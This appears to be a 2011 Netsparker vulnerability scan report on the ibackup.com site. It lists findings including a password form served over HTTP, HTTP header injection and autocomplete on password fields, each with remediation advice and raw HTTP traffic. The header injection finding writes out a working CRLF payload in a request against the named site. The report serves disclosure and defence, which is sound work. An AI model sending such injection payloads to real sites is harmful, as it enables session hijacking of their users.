<tr>                      <td class="textsmlbk">                        <p align="justify"><b><font color="#666666">Online Backup</font></b>:<b><font color="#666666">                          </font></b>With IBackup, Consumers and Organizations                          of all sizes can have the same enterprise-class data                          protection Fortune 500 uses to safeguard its critical                          information at a fraction of cost.<br>                        <table width="100%" border="0" cellspacing="0" cellpadding="3" class="textsmlbk">                          <tr>                            <td width="80" align="center" valign="middle"><a href="http://www.pcmag.com/article2/0,1759,1585218,00.asp" target="_blank"><img src="/images/ibackupEC.gif" width="56" height="105" border="0" alt="PC Magazine Editors' choice"></a></td>                            <td>                              <p align="justify">IBackup is 2004 PC Magazine Editors'                                choice for Online Backup Solutions.</p>                              <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">                                <tr valign="top">                                  <td width="50%"><a href="/regterms_new.htm"><img src="/images/but_3ctn.gif" width="104" height="25" vspace="0" alt="Consumer Free Trial" border="0"></a></td>                                  <td align="right"><a href="/businesstrial_new.htm"><img src="/images/but_3btn.gif" width="97" height="25" vspace="0" border="0" alt="Business Free Trial"></a></td>                                </tr>                              </table>                            </td>                          </tr>                        </table>                      </td>                    </tr>                  </table>                &..
		 
		
		
		Critical Form Served Over HTTP
		Critical Form Served Over HTTP  
		
		
			
Netsparker identified that a password field is served over HTTP. 
			
Impact 
If an attacker can carry out a MITM (Man in the middle ) attack, he/she may be able to intercept traffic by injecting JavaScript code into this page or changing action of the HTTP code to steal the users password. Even though the target page is HTTPS, this does not protect the system against MITM attacks.
This issue is important as it negates the use of SSL as a privacy protection barrier.
Actions to Take 
	
		See the remedy for solution. 
		Move all of your critical forms to HTTPS and do not allow these pages to be served over HTTP. 
	 
	
 
All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
		 
		
			
			
			
			
			
			
				https://www.ibackup.com/cgi-bin/LoginCheckCgi.cgi
			Request 
			GET /qmanager/jsp/ HTTP/1.1 Referer: http://www.ibackup.com/qmanager/jsp/regterms_new.jsp User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache ETag: W/"21186-1153127761000" Last-Modified: Mon, 17 Jul 2006 09:16:01 GMT Content-Length: 21186 Content-Type: text/html <SCRIPT LANGUAGE="JAVASCRIPT1.1" TYPE="TEXT/JAVASCRIPT">               window.location="https://www.ibackup.com"        </SCRIPT> <html><head><title>IBackup - Online Backup , Online Storage, Collaboration and Data Sharing</TITLE><META NAME="KEYWORDS" CONTENT="online backup data,online data backup,online server backup,online backup service,online server backups,online data backups,remote access, backup service,online file backups,online backups,remote data backups,online backup,online file backup,online backup services"><META NAME="DESCRIPTION" CONTENT="Online Backup: Specializing in online backup services and online storage services"><META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"><LINK REL=stylesheet TYPE="text/css" HREF="/images/style.css"><style>.textsmlbk {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}</style><script language="JavaScript"><!--function namosw_goto_byselect(sel, targetstr){  var index = sel.selectedIndex;  if (sel.options[index].value != '') {     if (targetstr == 'blank') {       window.open(sel.options[index].value, 'win1');     } else {       var frameobj;       if ((frameobj = eval(targetstr)) != null)       frameobj.location = sel.options[index].value;     }  }}function MM_swapImgRestore() { //v3.0  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;}function MM_preloadImages() { //v3.0  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}}function MM_findObj(n, d) { //v4.0  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);  if(!x && document.getElementById) x=document.getElementById(n); return x;}function MM_swapImage() { //v3.0  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}}//--></SCRIPT></head><script language='JavaScript'>function confirmSubmit(thisForm){   if(isBlank(thisForm.USERNAME.value))   {  alert("Username is required");      thisForm.USERNAME.focus();	  return false;   }   if(isBlank(thisForm.PASSWORD.value))   {  alert("Password cannot be blank");      thisForm.PASSWORD.focus();	  return false;   }   if(invaliddata(thisForm.USERNAME.value))   {  alert("Special characters are not allowed in username");      thisForm.USERNAME.focus();	  return false;   }    if(invaliddata(thisForm.PASSWORD.value))   {  alert("Special characters are not allowed in password");      thisForm.PASSWORD.focus();	  return false;   }   else   {      return true ;   }}function confirmSubmit1(thisForm){   if(confirmSubmit(thisForm)==true)   {   thisForm.action= "/qmanager/servlet/LoginWebFolderServlet";	   thisForm.method="POST";	   thisForm.submit;	   return true;   }   else   {  return false;   }}function invaliddata(Str)  {     if( (Str.indexOf("\'") != -1) || (Str.indexOf('\"') != -1) ||    (Str.indexOf('#') != -1) || (Str.indexOf('&') != -1)  ||    (Str.indexOf('%') != -1) || (Str.indexOf('*') != -1)  ||    (Str.indexOf('!') != -1) || (Str.indexOf('$') != -1)  ||    (Str.indexOf('/') != -1) || (Str.indexOf('\\') != -1)  ||    (Str.indexOf('-') != -1) ||    (Str.indexOf('@') != -1)|| (Str.indexOf('?') != -1) )     { return(true);     }     else     { return (false);     }  }function isBlank(Str) {   while(''+Str.charAt(0)==' ')   Str=Str.substring(1,Str.length);   while(''+Str.charAt(Str.length-1)==' ')   Str=Str.substring(0,Str.length-1);   if (Str == '')   { return(true);   }   else   { return(false);   }; }</script><body bgcolor="#FFFFFF" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onLoad="MM_preloadImages('/images/but_co3u.gif','/images/but_su3u.gif','/images/but_se3u.gif','/images/but_te3u.gif','/images/but_st3u.gif','/images/but_fq3u.gif')"><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#000000" class="textsmlbk">  <tr>    <td> </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" background="/images/grad_3ext.gif">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0" class="textsmlbk">          <tr>          <td width="103"><a href="/index.html"><img src="/images/logo_3.gif" width="103" height="43" alt="IBackup, Online backup & Online storage" border="0"></a></td>            <td width="47"><img src="/images/grad_3.gif" width="47" height="43"></td>            <td width="48"><img src="/images/cur_3.gif" width="48" height="43"></td>            <td width="414"><img src="/images/banr_3.jpg" width="414" height="43"></td>             <form>            <td background="/images/grad_3u.jpg" valign="middle" align="center" width="164">              </td> </form>          </tr>      </table>    </td>    <td background="/images/grad_3ext.gif">  </td>  </tr></table><table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="286396">  <tr>    <td width="776">      <table width="776" border="0" cellspacing="0" cellpadding="0">        <tr>          <td width="103" valign="top"><img src="/images/logo_3u.gif" width="103" height="20"></td>          <td width="47" valign="top"><img src="/images/grad_3ua.gif" width="47" height="20"></td>          <td width="48"><img src="/images/cur_3u.gif" width="48" height="20"></td>          <td valign="top" align="right"><img name="Image11" border="0" src="/images/but_ho3u.gif" width="82" height="20" alt="Home"><a href="/profile_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image12','','/images/but_co3u.gif',1)"><img name="Image12" border="0" src="/images/but_co3.gif" width="82" height="20" alt="Company"></a><a href="/regterms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image13','','/images/but_su3u.gif',1)"><img name="Image13" border="0" src="/images/but_su3.gif" width="82" height="20" alt="Sign up"></a><a href="/security_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image14','','/images/but_se3u.gif',1)"><img name="Image14" border="0" src="/images/but_se3.gif" width="82" height="20" alt="Security"></a><a href="/terms_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image15','','/images/but_te3u.gif',1)"><img name="Image15" border="0" src="/images/but_te3.gif" width="82" height="20" alt="Terms"></a><a href="/feedback_new.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image16','','/images/but_st3u.gif',1)"><img name="Image16" border="0" src="/images/but_st3.gif" width="82" height="20" alt="Support"></a><a href="/faq.htm" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image17','','/images/but_fq3u.gif',1)"><img name="Image17" border="0" src="/images/but_fq3.gif" width="82" height="20" alt="FAQ"></a></td>        </tr>      </table>    </td>    <td> </td>  </tr></table><table width="776" border="0" cellspacing="0" cellpadding="0">  <tr>    <td width="156" valign="top" bgcolor="#E5E5E5">      <table width="156" border="0" cellspacing="1" cellpadding="0" class="textsmlbk">        <form  name="form1" action= "https://www.ibackup.com/cgi-bin/LoginCheckCgi.cgi" method="post">          <tr>             <td height="43"> </td>            <td><b class="textsmlbk">Sign in</b><br>              <span class="textsmlbk">Username:</span><span class="textsmlbk"><font size="2"></font></span>               <br>              <input type="text" name="USERNAME" size="12" maxlength="20" class="fields">              <span class="textsmlbk"><br>              Password:</span> <br>              <input type="password" name="PASSWORD" size="12" maxlength="20" class="fields">              <br>              <input type='submit' name='login' value='Login'onClick=' return confirmSubmit(document.form1)' class="formfields">              <input type='image'src="/images/but_wfs3.gif" width="71" height="17" border="0" align="absmiddle" alt="Login to WebFolders"             			  onClick=' return confirmSubmit1(document.form1)' class="formfields" name="image">              <!--<a href="/qmanager/jsp/check_webfolder.jsp"><img src="/images/but_wfs3.gif" width="89" height="17" align="absbottom" border="0" alt="Login to WebFolders" vspace="2" onClick=' return confirmSubmit(document.form1)' ></a>-->            </td>          </tr>          <tr>            <td> </td>            <td><a href="/webfolders_new.htm" class="abodysml">What is WebFolders?</a></td>          </tr>          <tr>             <td> </td>            <td><a href="/forgotpass_new.htm" class="abodysml">Forgot your Password?</a>             </td>          </tr>        </form>      </table>      <table width="156" border="0" cellspacing="1" cellpadding="0">        <tr>          <td> </td>        </tr>        <tr>           <td><a href="/tour_start_new.htm"><img src="/images/nav_to3.gif" width="154" height="21" alt="Online Backup applications tour" border="0"></a></td>        </tr>        <tr>           <td><a href="/features.htm"><img src="/images/nav_dl3.gif" width="154" height="21" alt="Online Backup and Storage application Downloads" border="0"></a></td>        </tr>        <tr>           <td class="textsmlbk"> </td>        </tr>                <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"><a href="/charginghelp_new.htm#ep"><img src="../../images/promo_4_05.jpg" width="138" height="49" border="0" alt="online backup economy plans"></a></td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>        <tr>           <td class="textsmlbk" align="center"> </td>        </tr>      </table>      <table width="100%" border="0" cellspacing="0" cellpadding="0">        <tr>           <td align="center"> </td>        </tr>      </table>          </td>    <td valign="top" class="textsmlbk">      <table width="610" border="0" cellspacing="0" cellpadding="0" align="right">        <tr>          <td class="textsmlbk"> </td>        </tr>        <tr>          <td>            <table width="608" border="0" cellspacing="0" cellpadding="1" align="right">              <tr>                <td width="281" valign="top" bgcolor="#CCCCCC">                  <table width="281" border="0" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF">                    <tr>                      <td align="center"><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="../../download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" width="281" height="168">                          <param name=movie value="/images/flash_3.swf">                          <param name=quality value=high>                          <embed src="/images/flash_3.swf" quality=high pluginspage="macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="281" height="168">                          </embed>                        </OBJECT><script type="text/javascript" src="ieupdate.js"></script></td>                    </tr>                  </table>                </td>                <td width="10" class="textsmlbk" bgcolor="#FFFFFF"> </td>                <td valign="top" class="textsmlbk" bgcolor="#CCCCCC" height="168">                  <table width="100%" border="0" cellspacing="0" cellpadding="5" bgcolor="#FFFFFF" height="168">                    <tr>                      <td class="textsmlbk">                        <p align="justify"><b><font color="#666666">Online Backup</font></b>:<b><font color="#666666">                          </font></b>With IBackup, Consumers and Organizations                          of all sizes can have the same enterprise-class data                          protection Fortune 500 uses to safeguard its critical                          information at a fraction of cost.<br>                        <table width="100%" border="0" cellspacing="0" cellpadding="3" class="textsmlbk">                          <tr>                            <td width="80" align="center" valign="middle"><img src="/images/ibackupEC.gif" width="56" height="105" border="0" alt="PC Magazine Editors' choice"></td>                            <td>                              <p align="justify">IBackup is 2004 PC Magazine Editors'                                choice for Online Backup Solutions.</p>                              <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center">                                <tr valign="top">                                   <td align="center"> <a href="/regterms_new.htm"><img src="/images/cmd_freetrial.gif" width="99" height="35" border="0" alt="Evaluate IBackup using free trial"></a></td>                                </tr>                              </table>                            </td>                          </tr>                        </table>                      </td>                    </tr>                  </table>                </td>              </tr>              <tr>                <td colspan="3" valign="top" class="textsmlbk"> </td>              </tr>            </table>          </td>        </tr>        <tr>          <td>            <table width="100%" border="0" cellspacing="0" cellpadding="1" bgcolor="#CCCCCC">              <tr>                <td>                  <table width="100%" border="0" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF">                    <tr>                      <td class="textsmlbk">                        <p>IBackup is a secure, online storage/ backup, remote access                          and sharing solution for consumers and businesses with                          a unique combination of backup and storage functions.                          Protect your information assets with IBackup.                          ..
		 
		
		
		HTTP Header Injection
		HTTP Header Injection  
		
		
			
A CRLF (New line) injection in HTTP headers was identified. This means that the input goes into HTTP headers without proper input filtering.
			
Impact 
Depending on the application. An attacker might carry out the following forms of attacks:
	Cross-site Scripting attack which can lead to session hijacking 
	Session fixation attack by setting a new cookie, which can again lead to session hijacking 
  
Actions to Take 
	
		See the remedy for solution. 
		Ensure the server security patches are up to date and that the current stable version of the software is in use. 
	 
	
 
Do not allow newline characters in input. Where possible use strict white listing.
Required Skills for Successful Exploitation 
Crafting the attack to exploit this issue is not a complex process. However most of the unsophisticated attackers will not know that such an attack is possible. Also an attacker needs to reach his victim by an e-mail or other similar method in order to entice them to visit the site or click upon a URL.
External References 
		 
		
			
				
					
						- /qmanager/jsp/regterms_new.jsp
						
					 
				 
			
			
			
			
			Parameters 
			
				
					
						Parameter
					 
					
						Type
					 
					
						Value
					 
				 
				
					
						id
					 
					
						GET
					 
					
						http://example.com/?
ns: netsparker056650=vuln
					 
				 
			
			Request 
			GET /qmanager/jsp/regterms_new.jsp?id=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1 Referer: http://www.ibackup.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Cookie: JSESSIONID=CA113453A6F667BAEAFBFBC6E766EE92.tomcat9 Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 302 Moved Temporarily Date: Fri, 24 Jun 2011 02:03:00 GMT Server: Apache Cache-Control: no-cache Pragma: no-cache Expires: -1 Location: https://www5.ibackup.com/qmanager/jsp/SignUp_new.jsp?id=http://example.com/? ns: netsparker056650=vuln Content-Length: 0 Content-Type: text/html
		 
		
		
		Internal Server Error
		Internal Server Error  
		
		
			
The Server responded with an HTTP status 500. This indicates that there is a server-side error. Reasons may vary. The behavior should be analysed carefully. If Netsparker is able to find a security issue in the same resource it will report this as a separate vulnerability.
			
Impact 
The impact may vary depending on the condition. Generally this indicates poor coding practices, not enough error checking, sanitization and whitelisting. However there might be a bigger issue such as SQL Injection. If that's the case Netsparker will check for other possible issues and report them separately.
Analyse this issue and review the application code in order to handle unexpected errors, this should be a generic practice which does not disclose further information upon an error. All errors should be handled server side only.
		 
		
			
				
					
						- /qmanager/jsp/check_webfolder.jsp
						
					 
				 
			
			
			
			
			Request 
			GET /qmanager/jsp/check_webfolder.jsp HTTP/1.1 Referer: http://www.ibackup.com/qmanager/jsp/ User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Cookie: JSESSIONID=4CF8E543D93A429E5973A72C32256C65.tomcat9 Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 500 Internal Server Error Date: Fri, 24 Jun 2011 01:53:31 GMT Server: Apache ETag: W/"25848-1300181763000" Last-Modified: Tue, 15 Mar 2011 09:36:03 GMT Content-Length: 25848 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>IBackup - Online Backup, Storage, Data Sharing and Disaster Recovery for small and medium sized business</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="description" content="IBackup Online Backup is the industry-leading solution for multi-platform online backup, storage, sharing and advanced database backup for PC, Mac, Linux and almost any flavor of Unix" /> <meta name="keywords" content="Online Backup, Data Backup, Computer Backup, Remote Backup, Internet Backup, Backup Software, Remote Office Backup, Hard Drive Crash, Virus Attack, Simple, Automatic, Secure, IBackup, IBackup Professional, IBackup Drive" /> <link rel="stylesheet"  href="includes/obk_style.css" type="text/css"> <link rel="stylesheet"  href="includes/obk_jquery.css" type="text/css"> <script language="JavaScript" src="includes/jquery-1.3.2.js"></script> <script language="JavaScript" src="includes/obk_jquery.js"></script> <script language="JavaScript" src="includes/obk_AC_RunActiveContent.js"></script> <script language="JavaScript" src="includes/obk_mm_menu.js"></script> <script language="JavaScript" src="includes/obk_pmenu.js"></script> <script LANGUAGE="JavaScript" src="includes/obk_validation_login.js"></script> <script language="JavaScript" src="includes/obk_dropDown.js"></script> <script language="javascript" type="text/javascript"> //cookie setting. var refer=getURLParam("refer"); var pid = getURLParam("p"); if(refer!="") { 	Set_Cookie( 'ibkprefer', refer, 6, '/', '', '' ); } if(pid!="") { 	Set_Cookie( 'pid', pid, 0, '/', '', '' ); } function set_focus(){ document.getElementById("USERNAME").focus(); } /* set cookie */ function Set_Cookie( name, value, expires, path, domain, secure ) { var today = new Date(); today.setTime( today.getTime() ); if ( expires ) { expires = 12 * 1000 * 60 * 60 * 24 * 30; } var expires_date = new Date( today.getTime() + (expires) ); document.cookie = name + "=" +escape( value ) + ( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) + ( ( path ) ? ";path=" + path : "" ) + ( ( domain ) ? ";domain=" + domain : "" ) + ( ( secure ) ? ";secure" : "" ); } function getURLParam(strParamName){ var strReturn = ""; var strHref = window.location.href; if ( strHref.indexOf("?") > -1 ){ var strQueryString = strHref.substr(strHref.indexOf("?")).toLowerCase(); var aQueryString = strQueryString.split("&"); for ( var iParam = 0; iParam < aQueryString.length; iParam++ ){ if ( aQueryString[iParam].indexOf(strParamName.toLowerCase() + "=") > -1 ){ var aParam = aQueryString[iParam].split("="); strReturn = aParam[1]; break; } } } return unescape(strReturn); } function Read_Cookie(cookieName) { 	alert(cookieName);  var theCookie=""+document.cookie;  var ind=theCookie.indexOf(cookieName+"=");  if (ind==-1 || cookieName=="") return "";  var ind1=theCookie.indexOf(";",ind);  if (ind1==-1) ind1=theCookie.length;  return unescape(theCookie.substring(ind+cookieName.length+1,ind1)); } </script> <link rel="icon" href="/images/favicon.ico" type="image/x-icon" /> <link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"  /> </head> <body onload="set_focus();"> <script language="JavaScript1.2" type="text/javascript">mmLoadMenus();</script> <table width="100%" border="0" cellspacing="0" cellpadding="0">  <tr>   <td background="images/obk_topbg.jpg"><table width="960" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td width="160"><a href="index.html" id="index1"><img src="images/obk_logo.jpg" alt="IBackup - online backup and online storage" width="159" height="105" border="0" /></a> <script language="JavaScript" type="text/javascript"> 	var partid=getURLParam("p"); 	if(partid == ''){ 			partid = Read_Cookie('pid') 	} 	if(partid=='') 	{ 	document.getElementById("index1").href="index.html"; 	}else 	{ document.getElementById("index1").href="index.html?p="+partid; }          </script></td>      <td valign="middle"><form  name="form1" action= "https://www.ibackup.com/cgi-bin/LoginCheckCgi.cgi" method="post" onsubmit="return confirmSubmit(document.form1)">        <table width="50%" border="0" align="right" cellpadding="0" cellspacing="0">         <tr>          <td><img src="images/obk_txtlogin.jpg" width="112" height="14" /><br />           <img src="images/obk_spacer.gif" width="2" height="5" /></td>         </tr>         <tr>          <td><table width="100%" border="0" cellspacing="0" cellpadding="2">            <tr>             <td width="41%" class="txthead">Username or Email</td>             <td width="59%" colspan="2"><span class="txthead">Password | <a href="forgotpass_new.htm" class="lnkheader">Forgot                Password? </a> </span></td>            </tr>            <tr>             <td width="45%" valign="middle"><input name="USERNAME" type="text" id="USERNAME" size="22" maxlength="50"></td>             <td valign="middle" width="40%"><input name="PASSWORD" type="password" id="PASSWORD" size="20" maxlength="20"></td>             <td valign="middle" width="10%" align="left" id="submt"><input type="submit" value="" src="images/obk_bt_login.jpg" width="65" height="20" border="0" alt="SUBMIT" name="image"></td>            </tr>           </table></td>         </tr>        </table>       </form></td>     </tr>    </table></td>  </tr> </table> <table width="100%" bgcolor="#333333" border="0" cellpadding="0" cellspacing="0">  <tr>   <td><img src="images/obk_spacer.gif" width="2" height="10" /><br />    <table width="960" border="0" align="center" cellpadding="0" cellspacing="0" id="main_menu">     <tr>      <td id="mn_home"><a href="/index.html" id="home"><img src="images/obk_spacer.gif" alt="Home" width="46" height="40" border="0" /></a></td>      <td id="mn_sign"><a href="/qmanager/jsp/regterms_new.jsp" id="signupid" ><img src="images/obk_spacer.gif" alt="Sign up" width="108" height="40" border="0" /></a> <script language="javascript"> 	var partid=getURLParam("p"); 	//alert(partid); 	if(partid == ''){ 		partid = Read_Cookie('pid') 	} 	if(partid=='') 	{ 	document.getElementById("signupid").href="../qmanager/jsp/regterms_new.jsp"; 	}else 	{ document.getElementById("signupid").href="../qmanager/jsp/regterms_new.jsp?id="+partid; } </script></td>      <td id="mn_price"><a href="/charginghelp_new.htm"><img src="images/obk_spacer.gif" alt="Pricing Plans" width="141" height="40" border="0" /></a></td>      <td id="mn_prod"><a href="#"><img src="images/obk_spacer.gif" alt="Products" width="112" height="40" border="0"  name="products" onmouseover="MM_showMenu(window.mm_menu_0313114926_0,0,40,null,'products');" onmouseout="MM_startTimeout()" /></a></td>      <td id="mn_down"><a href="/online-backup-downloads/"><img src="images/obk_spacer.gif" alt="Downloads" width="131" height="40" border="0" /></a></td>      <td id="mn_secur"><a href="/online-backup-security/"><img src="images/obk_spacer.gif" alt="Security" width="106" height="40" border="0" /></a></td>      <td id="mn_supp"><a href="/feedback_new.htm"><img src="images/obk_spacer.gif" alt="Support" width="109" height="40" border="0" /></a></td>      <td id="mn_part"><a href="/online-backup-partners/"><img src="images/obk_spacer.gif" alt="Partners" width="109" height="40" border="0" /></a></td>      <td id="mn_faq"><a href="/online-backup-faq/"><img src="images/obk_spacer.gif" alt="FAQs" width="98" height="40" border="0" /></a></td>     </tr>    </table>    <img src="images/obk_spacer.gif" width="2" height="10" /><br />    <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td style="height:402px"><script type="text/javascript"> AC_FL_RunContent( 'codebase','download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0','width','960','height','402','src','obk_flash_promo_weekend','quality','high','wmode','transparent','AllowScriptAccess','always','pluginspage','macromedia.com/go/getflashplayer','movie','obk_flash_promo_weekend' ); //end AC code     </script>       <noscript>       <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="960" height="402">        <param name="movie" value="obk_flash_promo_weekend.swf" />        <param name="quality" value="high" />        <param name="wmode" value="transparent" />        <param name="AllowScriptAccess" value="always" />        <embed src="obk_flash_promo_weekend.swf" quality="high" pluginspage="macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="960" height="402" allowscriptaccess="always" ></embed>       </object>       </noscript></td>     </tr>    </table>    <img src="images/obk_spacer.gif" width="2" height="10" /><br /></td>  </tr> </table> <table width="100%" border="0" cellpadding="0" cellspacing="0">  <tr>   <td background="images/obk_contentbg.jpg" style="background-repeat:repeat-x;"><img src="images/obk_spacer.gif" width="2" height="30" /><br />    <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td valign="top" width="850"><h2 class="main_caption"><a href="/ibackup_advantage.htm">IBackup         Storage - Integrated</a></h2>       <p>Use the same data protection and recovery techniques that Fortune 500        companies rely <br />        on to safeguard your data! <a href="/ibackup_advantage.htm"><img src="images/obk_bt_more.gif" alt="More" width="47" height="17" border="0" align="absmiddle" /></a></p></td>      <td valign="top" width="110"><a href="feedback_new.htm"><img src="images/obk_home_support.jpg" width="309" height="117" border="0" /></a></td>     </tr>    </table>    <img src="images/obk_spacer.gif" width="3" height="55" />    <table width="960" border="0" align="center" cellpadding="0" cellspacing="0">     <tr>      <td width="480" valign="top"><table width="420" border="0" align="left" cellpadding="0" cellspacing="0">        <tr>         <td width="440"><a href="/online-backup-features/index.html"><img src="images/obk_icon_backup.jpg" width="111" height="119" border="0" align="left" /></a>          <h1 class="icon_caption"><img src="images/obk_spacer.gif" width="3" height="20" /><br />           <a href="/online-backup-features/index.html">Online Backup</a><br />           <img src="images/obk_spacer.gif" width="3" height="10" /><br />          </h1>          <p>IBackup enables small and medium sized businesses to get enterprise-class online backup with superior performance for their critical data at a fraction of cost. Global corporations, Business houses and people trust IBackup for their storage and backup needs. <a href="/online-backup-features/index.html"><img src="images/obk_bt_more.jpg" alt="More" width="47" height="17" border="0" align="absmiddle" /></a></p></td>        </tr>       </table></td>      <td width="480" valign="top"><table width="420" border="0" align="right" cellpadding="0" cellspacing="0">        <tr>         <td colspan="2"><a href="/online-storage-features/index.html"><img src="images/obk_icon_storage.jpg" width="111" height="119" border="0" align="left" /></a>          <h1 class="icon_caption"><img src="images/obk_spacer.gif" width="3" height="20" /><br />           <a href="/online-storage-features/index.html">Online Storage</a><br />           <img src="images/obk_spacer.gif" width="3" height="10" /><br />          </h1>          <p>IBackup provides an extensive enterprise ready feature-set for secure online storage with superior performance including Snapshots, Network Drive, Sharing, Collaboration, Sub-Accounts, WebFolders and Mobile Access. IBackup is the most recommended and used online storage and backup provider for small business. <a href="/online-storage-features/index.html"><img src="images/obk_bt_more.jpg" alt="More" width="47" height="17" border="0" align="absmiddle" /></a></p></td>        </tr> <..
		 
		
		
		Auto Complete Enabled
		Auto Complete Enabled  
		
		
			"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".
			
Impact 
Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.
Add the attribute autocomplete="off" to the form tag or to individual "input" fields.
Actions to Take 
	
		See the remedy for the solution. 
		Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended. 
		Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly. 
	 
	
 
Required Skills for Successful Exploitation 
	Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.
External References 
		 
		
			
			
			
			
			
			
				PASSWORD
			Request 
			GET /qmanager/jsp/ HTTP/1.1 Referer: http://www.ibackup.com/qmanager/jsp/regterms_new.jsp User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: www.ibackup.com Accept-Encoding: gzip, deflate
			Response 
			HTTP/1.1 200 OK Date: Fri, 24 Jun 2011 01:52:38 GMT Server: Apache ETag: W/"21186-1153127761000" Last-Modified: Mon, 17 Jul 2006 09:16:01 GMT Content-Length: 21186 Content-Type: text/html <SCRIPT LANGUAGE="JAVASCRIPT1.1" TYPE="TEXT/JAVASCRIPT">               window.location="https://www.ibackup.com"        </SCRIPT> <html><head><title>IBackup - Online Backup , Online Storage, Collaboration and Data Sharing</TITLE><META NAME="KEYWORDS" CONTENT="online backup data,online data backup,online server backup,online backup service,online server backups,online data backups,remote access, backup service,online file backups,online backups,remote data backups,online backup,online file backup,online backup services"><META NAME="DESCRIPTION" CONTENT="Online Backup: Specializing in online backup services and online storage services"><META NAME="ROBOTS" CONTENT="INDEX,FOLLOW"><LINK REL=stylesheet TYPE="text/css" HREF="/images/style.css"><style>.textsmlbk {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}</style><script language="JavaScript"><!--function namosw_goto_byselect(sel, targetstr){  var index = sel.selectedIndex;  if (sel.options[index].value != '') {     if (targetstr == 'blank') {       window.open(sel.options[index].value, 'win1');     } else {       var frameobj;       if ((frameobj = eval(targetstr)) != null)       frameobj.location = sel.options[index].value;     }  }}function MM_swapImgRestore() { 